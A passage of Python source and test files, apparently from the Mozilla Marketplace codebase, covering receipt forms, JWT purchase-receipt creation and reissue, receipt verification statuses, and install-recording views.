    Open to anonymous users; reached through RatingViewSet.flag.
    """
    queryset = ReviewFlag.objects.all()
    cors_allowed_methods = ('post',)
    permission_classes = [AllowAny]
    authentication_classes = [RestAnonymousAuthentication]
    serializer_class = RatingFlagSerializer

    def post_save(self, obj, created=False):
        # Any flag pushes the review back into the editor review queue.
        review = self.kwargs['review']
        Review.objects.filter(id=review).update(editorreview=True)
########NEW FILE########
__FILENAME__ = forms
from urlparse import urlparse
from django import forms
from tower import ugettext_lazy as _lazy
import amo
from addons.models import Addon
from mkt.api.forms import SluggableModelChoiceField
class ReceiptForm(forms.Form):
    """Form resolving the webapp a receipt refers to."""
    # Accepts either the pk or the app_slug of a webapp.
    app = SluggableModelChoiceField(
        queryset=Addon.objects.filter(type=amo.ADDON_WEBAPP),
        sluggable_to_field_name='app_slug')
class TestInstall(forms.Form):
    """Devhub form: install an app with a chosen test-receipt flavour."""
    TYPE_CHOICES = (('none', _lazy('No receipt')),
                    ('ok', _lazy(u'Test receipt')),
                    ('expired', _lazy(u'Expired test receipt')),
                    ('invalid', _lazy(u'Invalid test receipt')),
                    ('refunded', _lazy(u'Refunded test receipt')))
    receipt_type = forms.ChoiceField(choices=TYPE_CHOICES)
    manifest_url = forms.URLField()

    def clean(self):
        # Derive the app origin ("scheme://host") from the manifest URL so
        # callers don't have to re-parse it.
        data = self.cleaned_data
        url = data.get('manifest_url')
        if url:
            parsed = urlparse(url)
            data['root'] = '%s://%s' % (parsed.scheme, parsed.netloc)
        return data
########NEW FILE########
__FILENAME__ = test_models
import calendar
import time
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons.models import AddonUser
from amo.helpers import absolutify
from amo.tests import addon_factory
from mkt.receipts.utils import create_receipt, get_key
from mkt.webapps.models import Installed, Webapp
from users.models import UserProfile
# We are testing times down to the second. To make sure we don't fail, this
# is the amount of leeway in seconds we are giving the timing tests.
TEST_LEEWAY = 100
class TestReceipt(amo.tests.TestCase):
    """Tests for Installed records and receipt (JWT) generation."""
    fixtures = ['base/users.json']

    def setUp(self):
        self.app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
        self.app.update(manifest_url='http://f.c/')
        self.user = UserProfile.objects.get(pk=999)
        self.other_user = UserProfile.objects.exclude(pk=999)[0]

    def create_install(self, user, webapp):
        # Helper: ensure the app looks installable, then get-or-create the
        # Installed row for (user, webapp).
        webapp.update(type=amo.ADDON_WEBAPP,
                      manifest_url='http://somesite.com/')
        return Installed.objects.safer_get_or_create(user=user,
                                                     addon=webapp)[0]

    def test_get_or_create(self):
        install = self.create_install(self.user, self.app)
        eq_(install, self.create_install(self.user, self.app))

    def test_has_installed(self):
        assert not self.app.has_installed(self.user)
        self.create_install(self.user, self.app)
        assert self.app.has_installed(self.user)

    def test_receipt(self):
        # The JWS always starts with the base64 of the RS512 header.
        assert (create_receipt(self.app, self.user, 'some-uuid')
                .startswith('eyJhbGciOiAiUlM1MTIiLCA'))

    def test_receipt_different(self):
        assert (create_receipt(self.app, self.user, 'some-uuid')
                != create_receipt(self.app, self.other_user, 'other-uuid'))

    def test_addon_premium(self):
        for type_ in amo.ADDON_PREMIUMS:
            self.app.update(premium_type=type_)
            assert create_receipt(self.app, self.user, 'some-uuid')

    def test_install_has_uuid(self):
        install = self.create_install(self.user, self.app)
        assert install.uuid.startswith(str(install.pk))

    def test_install_not_premium(self):
        for type_ in amo.ADDON_FREES:
            self.app.update(premium_type=type_)
            Installed.objects.all().delete()
            install = self.create_install(self.user,
                                          Webapp.objects.get(pk=self.app.pk))
            eq_(install.premium_type, type_)

    def test_install_premium(self):
        for type_ in amo.ADDON_PREMIUMS:
            self.app.update(premium_type=type_)
            Installed.objects.all().delete()
            install = self.create_install(self.user, self.app)
            eq_(install.premium_type, type_)

    @mock.patch('jwt.encode')
    def test_receipt_data(self, encode):
        # Intercept jwt.encode to inspect the raw receipt payload.
        encode.return_value = 'tmp-to-keep-memoize-happy'
        create_receipt(self.app, self.user, 'some-uuid')
        receipt = encode.call_args[0][0]
        eq_(receipt['product']['url'], self.app.manifest_url[:-1])
        eq_(receipt['product']['storedata'], 'id=%s' % int(self.app.pk))
        assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
                                 settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS -
                                 TEST_LEEWAY)
        eq_(receipt['reissue'], absolutify(reverse('receipt.reissue')))

    def test_receipt_not_reviewer(self):
        with self.assertRaises(ValueError):
            create_receipt(self.app, self.user, 'some-uuid',
                           flavour='reviewer')

    def test_receipt_other(self):
        with self.assertRaises(AssertionError):
            create_receipt(self.app, self.user, 'some-uuid', flavour='wat')

    @mock.patch('jwt.encode')
    def for_user(self, app, user, flavour, encode):
        # Helper (not a test): create a receipt of the given flavour and
        # return the payload passed to jwt.encode.
        encode.return_value = 'tmp-to-keep-memoize-happy'
        create_receipt(app, user, 'some-uuid', flavour=flavour)
        receipt = encode.call_args[0][0]
        eq_(receipt['typ'], flavour + '-receipt')
        eq_(receipt['verify'],
            absolutify(reverse('receipt.verify', args=[app.guid])))
        return receipt

    def test_receipt_data_developer(self):
        user = UserProfile.objects.get(pk=5497308)
        receipt = self.for_user(self.app, user, 'developer')
        assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
                                 (60 * 60 * 24) - TEST_LEEWAY)

    def test_receipt_data_reviewer(self):
        user = UserProfile.objects.get(pk=999)
        AddonUser.objects.create(addon=self.app, user=user)
        receipt = self.for_user(self.app, user, 'reviewer')
        assert receipt['exp'] > (calendar.timegm(time.gmtime()) +
                                 (60 * 60 * 24) - TEST_LEEWAY)

    def test_receipt_packaged(self):
        app = addon_factory(type=amo.ADDON_WEBAPP, is_packaged=True,
                            app_domain='app://foo.com')
        user = UserProfile.objects.get(pk=5497308)
        receipt = self.for_user(app, user, 'developer')
        eq_(receipt['product']['url'], 'app://foo.com')

    def test_receipt_packaged_no_origin(self):
        app = addon_factory(type=amo.ADDON_WEBAPP, is_packaged=True)
        user = UserProfile.objects.get(pk=5497308)
        receipt = self.for_user(app, user, 'developer')
        eq_(receipt['product']['url'], settings.SITE_URL)
# Point the receipt key at a path that does not exist ('.foo' suffix) so
# loading it must fail.
@mock.patch.object(settings, 'WEBAPPS_RECEIPT_KEY',
                   amo.tests.AMOPaths.sample_key() + '.foo')
class TestBrokenReceipt(amo.tests.TestCase):
    def test_get_key(self):
        self.assertRaises(IOError, get_key)
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from receipts.receipts import Receipt
from amo.tests import TestCase
from mkt.receipts.tests.test_verify import sample
from mkt.receipts.utils import reissue_receipt
class TestReissue(TestCase):
    """Reissuing a receipt must refresh its timestamps and nothing else."""

    def test_expired(self):
        old = Receipt(sample).receipt_decoded()
        new = Receipt(reissue_receipt(sample)).receipt_decoded()
        # Timestamp claims move forward on reissue.
        for greater in ['exp', 'iat', 'nbf']:
            assert new[greater] > old[greater], (
                '{0} for new: {1} should be greater than old: {2}'.format(
                    greater, new[greater], old[greater]))
        # All other claims are carried over unchanged.
        for same in ['product', 'detail', 'iss', 'reissue', 'typ', 'user',
                     'verify']:
            eq_(new[same], old[same], (
                # Bug fix: the failure message previously interpolated the
                # stale `greater` variable from the loop above instead of
                # `same`, naming the wrong key on failure.
                '{0} for new: {1} should be the same as old: {2}'.format(
                    same, new[same], old[same])))
########NEW FILE########
__FILENAME__ = test_verify
# -*- coding: utf-8 -*-
import calendar
import time
from urllib import urlencode
from django.db import connection
from django.conf import settings
import jwt
import M2Crypto
import mock
from browserid.errors import ExpiredSignatureError
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import Addon
from services import utils, verify
from mkt.receipts.utils import create_receipt
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPurchase
from users.models import UserProfile
from stats.models import Contribution
def get_response(data, status):
    """Fabricate a minimal urllib-style HTTP response mock.

    The returned Mock answers ``read()`` with *data* and ``getcode()``
    with *status*, which is all the verification code consumes.
    """
    fake = mock.Mock()
    fake.read.return_value = data
    fake.getcode.return_value = status
    return fake
sample = ('eyJqa3UiOiAiaHR0cHM6Ly9tYXJrZXRwbGFjZS1kZXYtY2RuL'
'mFsbGl6b20ub3JnL3B1YmxpY19rZXlzL3Rlc3Rfcm9vdF9wdWIuandrIiwgInR5cCI6ICJKV'
'1QiLCAiYWxnIjogIlJTMjU2In0.eyJwcm9kdWN0IjogeyJ1cmwiOiAiaHR0cDovL2Rla2tvc'
'3R1ZGlvcy5jb20iLCAic3RvcmVkYXRhIjogImlkPTM2Mzk4MiJ9LCAiaXNzIjogImh0dHBzO'
'i8vbWFya2V0cGxhY2UtZGV2LmFsbGl6b20ub3JnIiwgInZlcmlmeSI6ICJodHRwczovL3JlY'
'2VpcHRjaGVjay1tYXJrZXRwbGFjZS1kZXYuYWxsaXpvbS5vcmcvdmVyaWZ5LzM2Mzk4MiIsI'
'CJkZXRhaWwiOiAiaHR0cHM6Ly9tYXJrZXRwbGFjZS1kZXYuYWxsaXpvbS5vcmcvZW4tVVMvc'
'HVyY2hhc2VzLzM2Mzk4MiIsICJyZWlzc3VlIjogImh0dHBzOi8vbWFya2V0cGxhY2UtZGV2L'
'mFsbGl6b20ub3JnL2VuLVVTL2FwcC9zZWV2YW5zLXVuZGVyd29ybGQtYWR2ZW50dXIvcHVyY'
'2hhc2UvcmVpc3N1ZSIsICJ1c2VyIjogeyJ0eXBlIjogImRpcmVjdGVkLWlkZW50aWZpZXIiL'
'CAidmFsdWUiOiAiMjYzLTI3OGIwYTc3LWE5MGMtNDYyOC1iODQ3LWU3YTU0MzQ1YTMyMCJ9L'
'CAiZXhwIjogMTMzNTk5MDkwOSwgImlhdCI6IDEzMzUzODYxMDksICJ0eXAiOiAicHVyY2hhc'
'2UtcmVjZWlwdCIsICJuYmYiOiAxMzM1Mzg2MTA5fQ.ksPSozpX5ufHSdjrKGEUa9QC1tLh_t'
'a-xIkY18ZRwbmDqV05oCLdhzO6L1Gqzg8bCUg3cl_cBD9cKP23dvqfSwydeZlQL0jbBEUSIs'
'9EDd1_eIDOt_ifjm0D6YrTvfXuokRhD5ojhS6b8_fzAlWiQ_UWnyccaYE2eflR96hGXi-cJZ'
'9u6Fb9DNlgAK4xI4uLzYHxJJuY2N9yotcle0IzQGDBIooBKIns7FWC7J5mCdTJP4nil2rrMb'
'pprvfinNhfK5oYPWTPgc3NQNteBbK7XDoY2ZESXW66sYgG5jDMVnhTO2NXJmyDHuIrhiVWsf'
'xVjY54e0R4NlfjsQmM3wURxg')
# There are two "different" settings files that need to be patched,
# even though they are the same file.
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
                   amo.tests.AMOPaths.sample_key())
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_URL', 'http://foo.com')
class TestVerify(amo.tests.TestCase):
    """End-to-end tests for the standalone receipt verification service."""
    fixtures = fixture('webapp_337141', 'user_999')

    def setUp(self):
        self.addon = Addon.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=999)
        # Baseline valid receipt payload; individual tests copy and
        # mutate it.
        self.user_data = {'user': {'type': 'directed-identifier',
                                   'value': 'some-uuid'},
                          'product': {'url': 'http://f.com',
                                      'storedata': urlencode({'id': 337141})},
                          'verify': 'https://foo.com/verifyme/',
                          'exp': calendar.timegm(time.gmtime()) + 1000,
                          'typ': 'purchase-receipt'}

    def get_decode(self, receipt, check_purchase=True):
        # Ensure that the verify code is using the test database cursor.
        v = verify.Verify(receipt, RequestFactory().get('/verifyme/').META)
        v.cursor = connection.cursor()
        name = 'check_full' if check_purchase else 'check_without_purchase'
        return getattr(v, name)()

    @mock.patch.object(verify, 'decode_receipt')
    def get(self, receipt, decode_receipt, check_purchase=True):
        # Helper: skip the crypto decoding step and feed the dict straight
        # into the verification logic.
        decode_receipt.return_value = receipt
        return self.get_decode('', check_purchase=check_purchase)

    def make_purchase(self):
        return AddonPurchase.objects.create(addon=self.addon, user=self.user,
                                            uuid='some-uuid')

    def make_contribution(self, type=amo.CONTRIB_PURCHASE):
        cont = Contribution.objects.create(addon=self.addon, user=self.user,
                                           type=type)
        # This was created by the contribution, but we need to tweak
        # the uuid to ensure its correct.
        AddonPurchase.objects.get().update(uuid='some-uuid')
        return cont

    def get_uuid(self):
        return self.make_purchase().uuid

    @mock.patch.object(utils.settings, 'SIGNING_SERVER_ACTIVE', True)
    def test_invalid_receipt(self):
        eq_(self.get_decode('blah')['status'], 'invalid')

    def test_invalid_signature(self):
        eq_(self.get_decode('blah.blah.blah')['status'], 'invalid')

    @mock.patch('services.verify.receipt_cef.log')
    def test_no_user(self, log):
        user_data = self.user_data.copy()
        del user_data['user']
        res = self.get(user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'NO_DIRECTED_IDENTIFIER')
        ok_(log.called)

    def test_no_addon(self):
        user_data = self.user_data.copy()
        del user_data['product']
        res = self.get(user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'WRONG_STOREDATA')

    def test_user_type_incorrect(self):
        user_data = self.user_data.copy()
        user_data['user']['type'] = 'nope'
        res = self.get(user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'NO_DIRECTED_IDENTIFIER')

    def test_type(self):
        user_data = self.user_data.copy()
        user_data['typ'] = 'anything'
        res = self.get(user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'WRONG_TYPE')

    def test_user_incorrect(self):
        user_data = self.user_data.copy()
        user_data['user']['value'] = 'ugh'
        res = self.get(user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'NO_PURCHASE')

    def test_user_deleted(self):
        self.user.delete()
        res = self.get(self.user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'NO_PURCHASE')

    def test_user_anonymise(self):
        #self.user.anonymize()
        self.make_purchase()
        res = self.get(self.user_data)
        eq_(res['status'], 'ok')

    @mock.patch('services.verify.sign')
    @mock.patch('services.verify.receipt_cef.log')
    def test_expired(self, log, sign):
        sign.return_value = ''
        user_data = self.user_data.copy()
        user_data['exp'] = calendar.timegm(time.gmtime()) - 1000
        self.make_purchase()
        res = self.get(user_data)
        eq_(res['status'], 'expired')
        ok_(log.called)

    @mock.patch('services.verify.sign')
    def test_garbage_expired(self, sign):
        # A non-numeric exp is treated the same as an expired receipt.
        sign.return_value = ''
        user_data = self.user_data.copy()
        user_data['exp'] = 'a'
        self.make_purchase()
        res = self.get(user_data)
        eq_(res['status'], 'expired')

    @mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_EXPIRED_SEND', True)
    @mock.patch('services.verify.sign')
    def test_expired_has_receipt(self, sign):
        # With WEBAPPS_RECEIPT_EXPIRED_SEND on, an expired response also
        # carries a freshly signed receipt.
        sign.return_value = ''
        user_data = self.user_data.copy()
        user_data['exp'] = calendar.timegm(time.gmtime()) - 1000
        self.make_purchase()
        res = self.get(user_data)
        assert 'receipt' in res

    @mock.patch.object(utils.settings, 'SIGNING_SERVER_ACTIVE', True)
    @mock.patch('services.verify.receipts.certs.ReceiptVerifier.verify')
    def test_expired_cert(self, mthd):
        # An expired signing cert must not prevent decoding the receipt.
        mthd.side_effect = ExpiredSignatureError
        assert 'typ' in verify.decode_receipt('.~' + sample)

    @mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_EXPIRED_SEND', True)
    @mock.patch('services.verify.sign')
    def test_new_expiry(self, sign):
        user_data = self.user_data.copy()
        user_data['exp'] = old = calendar.timegm(time.gmtime()) - 10000
        self.make_purchase()
        sign.return_value = ''
        self.get(user_data)
        assert sign.call_args[0][0]['exp'] > old

    def test_expired_not_signed(self):
        user_data = self.user_data.copy()
        user_data['exp'] = calendar.timegm(time.gmtime()) - 10000
        self.make_purchase()
        res = self.get(user_data)
        eq_(res['status'], 'expired')

    def test_premium_addon_not_purchased(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        res = self.get(self.user_data)
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'NO_PURCHASE')

    def test_premium_dont_check(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        res = self.get(self.user_data, check_purchase=False)
        # Because the receipt is the wrong type for skipping purchase.
        eq_(res['status'], 'invalid')
        eq_(res['reason'], 'WRONG_TYPE')

    @mock.patch.object(utils.settings, 'DOMAIN', 'foo.com')
    def test_premium_dont_check_properly(self):
        # developer-receipt type allows skipping the purchase check.
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        user_data = self.user_data.copy()
        user_data['typ'] = 'developer-receipt'
        res = self.get(user_data, check_purchase=False)
        eq_(res['status'], 'ok')

    def test_premium_addon_purchased(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.make_purchase()
        res = self.get(self.user_data)
        eq_(res['status'], 'ok')

    def test_premium_addon_contribution(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        # There's no purchase, but the last entry we have is a sale.
        self.make_contribution()
        res = self.get(self.user_data)
        eq_(res['status'], 'ok')

    @mock.patch('services.verify.receipt_cef.log')
    def test_premium_addon_refund(self, log):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        purchase = self.make_purchase()
        for type in [amo.CONTRIB_REFUND, amo.CONTRIB_CHARGEBACK]:
            purchase.update(type=type)
            res = self.get(self.user_data)
            eq_(res['status'], 'refunded')
        eq_(log.call_count, 2)

    def test_premium_no_charge(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        purchase = self.make_purchase()
        purchase.update(type=amo.CONTRIB_NO_CHARGE)
        res = self.get(self.user_data)
        eq_(res['status'], 'ok')

    def test_other_premiums(self):
        self.make_purchase()
        for k in (amo.ADDON_PREMIUM, amo.ADDON_PREMIUM_INAPP):
            self.addon.update(premium_type=k)
            res = self.get(self.user_data)
            eq_(res['status'], 'ok')

    def test_product_wrong_store_data(self):
        self.make_purchase()
        data = self.user_data.copy()
        data['product'] = {'url': 'http://f.com',
                           'storedata': urlencode({'id': 123})}
        eq_(self.get(data)['status'], 'invalid')

    def test_product_ok_store_data(self):
        self.make_purchase()
        data = self.user_data.copy()
        data['product'] = {'url': 'http://f.com',
                           'storedata': urlencode({'id': 337141})}
        eq_(self.get(data)['status'], 'ok')

    def test_product_barf_store_data(self):
        self.make_purchase()
        for storedata in (urlencode({'id': 'NaN'}), 'NaN'):
            data = self.user_data.copy()
            data['product'] = {'url': 'http://f.com', 'storedata': storedata}
            res = self.get(data)
            eq_(res['status'], 'invalid')
            eq_(res['reason'], 'WRONG_STOREDATA')

    def test_crack_receipt(self):
        # Check that we can decode our receipt and get a dictionary back.
        self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
        purchase = self.make_purchase()
        receipt = create_receipt(purchase.addon, purchase.user, purchase.uuid)
        result = verify.decode_receipt(receipt)
        eq_(result['typ'], u'purchase-receipt')

    @mock.patch('services.verify.settings')
    @mock.patch('services.verify.receipts.certs.ReceiptVerifier')
    def test_crack_receipt_new_called(self, trunion_verify, settings):
        # Check that we can decode our receipt and get a dictionary back.
        self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
        verify.decode_receipt('.~' + sample)
        assert trunion_verify.called

    def test_crack_borked_receipt(self):
        self.addon.update(type=amo.ADDON_WEBAPP, manifest_url='http://a.com')
        purchase = self.make_purchase()
        receipt = create_receipt(purchase.addon, purchase.user, purchase.uuid)
        self.assertRaises(M2Crypto.RSA.RSAError, verify.decode_receipt,
                          receipt + 'x')

    @mock.patch.object(verify, 'decode_receipt')
    def get_headers(self, decode_receipt):
        # Helper: fetch the HTTP headers emitted by the verify service.
        decode_receipt.return_value = ''
        return verify.get_headers(verify.Verify('', mock.Mock()))

    def test_cross_domain(self):
        hdrs = self.get_headers()
        assert ('Access-Control-Allow-Origin', '*') in hdrs, (
            'No cross domain headers')
        assert ('Access-Control-Allow-Methods', 'POST') in hdrs, (
            'Allow POST only')

    def test_no_cache(self):
        hdrs = self.get_headers()
        assert ('Cache-Control', 'no-cache') in hdrs, 'No cache header needed'
class TestBase(amo.tests.TestCase):
    """Shared helper base for receipt-claim unit tests."""

    def create(self, data, request=None):
        # Sign `data` (merged over a minimal user stanza) into a receipt
        # and return a Verify instance with it already decoded.
        stuff = {'user': {'type': 'directed-identifier'}}
        stuff.update(data)
        key = jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
        receipt = jwt.encode(stuff, key, u'RS512')
        v = verify.Verify(receipt, request)
        v.decoded = v.decode()
        return v
class TestType(TestBase):
    """Tests for Verify.check_type (the `typ` claim)."""

    @mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
                       amo.tests.AMOPaths.sample_key())
    def test_no_type(self):
        self.create({'typ': 'test-receipt'}).check_type('test-receipt')

    def test_wrong_type(self):
        # A receipt with no `typ` claim must not pass the type check.
        with self.assertRaises(verify.InvalidReceipt):
            self.create({}).check_type('test-receipt')

    def test_test_type(self):
        sample = {'typ': 'test-receipt'}
        with self.assertRaises(verify.InvalidReceipt):
            self.create(sample).check_type('blargh')
@mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
                   amo.tests.AMOPaths.sample_key())
class TestURL(TestBase):
    """Tests for Verify.check_url (the `verify` claim)."""

    def setUp(self):
        self.req = RequestFactory().post('/foo').META

    def test_wrong_domain(self):
        sample = {'verify': 'https://foo.com'}
        with self.assertRaises(verify.InvalidReceipt) as err:
            self.create(sample, request=self.req).check_url('f.com')
        eq_(str(err.exception), 'WRONG_DOMAIN')

    def test_wrong_path(self):
        sample = {'verify': 'https://f.com/bar'}
        with self.assertRaises(verify.InvalidReceipt) as err:
            self.create(sample, request=self.req).check_url('f.com')
        eq_(str(err.exception), 'WRONG_PATH')

    @mock.patch.object(utils.settings, 'WEBAPPS_RECEIPT_KEY',
                       amo.tests.AMOPaths.sample_key())
    def test_good(self):
        # Domain and path both match the request: no exception expected.
        sample = {'verify': 'https://f.com/foo'}
        self.create(sample, request=self.req).check_url('f.com')
class TestServices(amo.tests.TestCase):
    def test_wrong_settings(self):
        # An empty SIGNING_SERVER_ACTIVE setting makes the status check
        # report a 500.
        with self.settings(SIGNING_SERVER_ACTIVE=''):
            eq_(verify.status_check({})[0], 500)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import calendar
import json
import time
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonUser
from amo.helpers import absolutify
from devhub.models import AppLog
from mkt.constants import apps
from mkt.receipts.tests.test_models import TEST_LEEWAY
from mkt.receipts.utils import create_test_receipt
from mkt.receipts.views import devhub_verify
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from services.verify import decode_receipt, settings as verify_settings
from users.models import UserProfile
from zadmin.models import DownloadSource
class TestInstall(amo.tests.TestCase):
    """Tests for the install-recording endpoint (metrics, CEF logging and
    receipt issuing)."""
    fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
                       'group_editor')

    def setUp(self):
        self.addon = amo.tests.app_factory(manifest_url='http://cbc.ca/man')
        self.url = self.addon.get_detail_url('record')
        self.user = UserProfile.objects.get(email='[email protected]')
        assert self.client.login(username=self.user.email, password='password')

    def test_pending_free_for_reviewer(self):
        self.addon.update(status=amo.STATUS_PENDING)
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.post(self.url).status_code, 200)

    def test_pending_free_for_developer(self):
        AddonUser.objects.create(addon=self.addon, user=self.user)
        self.addon.update(status=amo.STATUS_PENDING)
        eq_(self.client.post(self.url).status_code, 200)

    def test_pending_free_for_anonymous(self):
        self.addon.update(status=amo.STATUS_PENDING)
        eq_(self.client.post(self.url).status_code, 404)

    def test_pending_paid_for_reviewer(self):
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        assert self.client.login(username='[email protected]',
                                 password='password')
        eq_(self.client.post(self.url).status_code, 200)
        # Because they aren't using reviewer tools, they'll get a normal
        # install record and receipt.
        eq_(self.addon.installed.all()[0].install_type,
            apps.INSTALL_TYPE_USER)

    def test_pending_paid_for_admin(self):
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        self.grant_permission(self.user, '*:*')
        eq_(self.client.post(self.url).status_code, 200)
        # Check ownership ignores admin users.
        eq_(self.addon.installed.all()[0].install_type,
            apps.INSTALL_TYPE_USER)

    def test_pending_paid_for_developer(self):
        AddonUser.objects.create(addon=self.addon, user=self.user)
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        eq_(self.client.post(self.url).status_code, 200)
        eq_(self.user.installed_set.all()[0].install_type,
            apps.INSTALL_TYPE_DEVELOPER)

    def test_pending_paid_for_anonymous(self):
        self.addon.update(status=amo.STATUS_PENDING,
                          premium_type=amo.ADDON_PREMIUM)
        eq_(self.client.post(self.url).status_code, 404)

    def test_not_record_addon(self):
        # Non-webapp addons are not recordable at all.
        self.addon.update(type=amo.ADDON_EXTENSION)
        res = self.client.post(self.url)
        eq_(res.status_code, 404)
        eq_(self.user.installed_set.count(), 0)

    @mock.patch('mkt.webapps.models.Webapp.has_purchased')
    def test_paid(self, has_purchased):
        has_purchased.return_value = True
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        eq_(self.client.post(self.url).status_code, 200)

    def test_own_payments(self):
        self.addon.update(premium_type=amo.ADDON_OTHER_INAPP)
        eq_(self.client.post(self.url).status_code, 200)

    @mock.patch('mkt.webapps.models.Webapp.has_purchased')
    def test_not_paid(self, has_purchased):
        has_purchased.return_value = False
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        eq_(self.client.post(self.url).status_code, 403)

    def test_record_logged_out(self):
        self.client.logout()
        res = self.client.post(self.url)
        eq_(res.status_code, 200)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_log_metrics(self, cef):
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        logs = AppLog.objects.filter(addon=self.addon)
        eq_(logs.count(), 1)
        eq_(logs[0].activity_log.action, amo.LOG.INSTALL_ADDON.id)

    @mock.patch('mkt.receipts.views.record_action')
    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_metrics(self, cef, record_action):
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(record_action.call_args[0][0], 'install')
        eq_(record_action.call_args[0][2], {'app-domain': u'http://cbc.ca',
                                            'app-id': self.addon.pk,
                                            'anonymous': False})

    @mock.patch('mkt.receipts.views.record_action')
    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_metrics_packaged_app(self, cef, record_action):
        # Mimic packaged app.
        self.addon.update(is_packaged=True, manifest_url=None,
                          app_domain='app://f.c')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(record_action.call_args[0][0], 'install')
        eq_(record_action.call_args[0][2], {
            'app-domain': 'app://f.c',
            'app-id': self.addon.pk,
            'anonymous': False})

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_cef_logs(self, cef):
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(len(cef.call_args_list), 1)
        eq_([x[0][2] for x in cef.call_args_list], ['sign'])

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_install(self, cef):
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        installed = self.user.installed_set.all()
        eq_(len(installed), 1)
        eq_(installed[0].install_type, apps.INSTALL_TYPE_USER)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_multiple_installs(self, cef):
        # Recording twice must not create a duplicate Installed row.
        self.client.post(self.url)
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(self.user.installed_set.count(), 1)

    @mock.patch('mkt.receipts.views.receipt_cef.log')
    def test_record_receipt(self, cef):
        res = self.client.post(self.url)
        content = json.loads(res.content)
        assert content.get('receipt'), content
class TestReceiptVerify(amo.tests.TestCase):
    """Tests for the receipt.verify view (reviewer/developer receipts)."""
    fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
                       'group_editor')

    def setUp(self):
        super(TestReceiptVerify, self).setUp()
        self.app = Webapp.objects.create(app_slug='foo', guid=uuid.uuid4())
        self.url = reverse('receipt.verify',
                           args=[self.app.guid])
        self.log = AppLog.objects.filter(addon=self.app)
        self.reviewer = UserProfile.objects.get(pk=5497308)

    def get_mock(self, user=None, **kwargs):
        # Build a mock Verify object whose check results are canned JSON.
        self.verify = mock.Mock()
        self.verify.return_value = json.dumps(kwargs)
        self.verify.check_without_purchase.return_value = json.dumps(
            {'status': 'ok'})
        self.verify.invalid.return_value = json.dumps({'status': 'invalid'})
        self.verify.user_id = user.pk if user else self.reviewer.pk
        return self.verify

    def test_post_required(self):
        eq_(self.client.get(self.url).status_code, 405)

    @mock.patch('mkt.receipts.views.Verify')
    def test_empty(self, verify):
        vfy = self.get_mock(user=self.reviewer, status='invalid')
        # Because the receipt was empty, this never got set and so
        # we didn't log it.
        vfy.user_id = None
        verify.return_value = vfy
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(self.log.count(), 0)
        eq_(json.loads(res.content)['status'], 'invalid')

    @mock.patch('mkt.receipts.views.Verify')
    def test_good(self, verify):
        verify.return_value = self.get_mock(user=self.reviewer, status='ok')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(self.log.count(), 1)
        eq_(json.loads(res.content)['status'], 'ok')

    @mock.patch('mkt.receipts.views.Verify')
    def test_not_reviewer(self, verify):
        # Without reviewer group membership the receipt is invalid.
        self.reviewer.groups.clear()
        verify.return_value = self.get_mock(user=self.reviewer, status='ok')
        res = self.client.post(self.url)
